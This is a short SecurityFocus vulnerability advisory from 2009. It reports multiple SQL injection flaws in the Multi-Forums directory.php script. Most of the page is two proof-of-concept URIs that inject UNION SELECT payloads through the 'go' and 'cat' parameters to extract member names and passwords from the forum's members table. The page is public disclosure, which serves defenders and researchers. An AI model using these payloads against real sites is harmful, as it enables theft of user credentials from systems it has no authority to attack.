Search: Home Bugtraq Vulnerabilities Mailing Lists Jobs Tools Beta Programs

Multi-Forums Directory.PHP Multiple SQL Injection Vulnerabilities

Attackers can use a browser to exploit these issues.

The following proof-of-concept URIs are available:

http://www.example.com/directory.php?go=-1+union+select+1,concat(name,0x3a,password),3+from+[forum]_members+where+id=[id]
http://www.example.com/directory.php?cat=-1+union+select+1,concat(name,0x3a,password),3+from+[forum]_members+where+id=[id]







 

Privacy Statement
Copyright 2009, SecurityFocus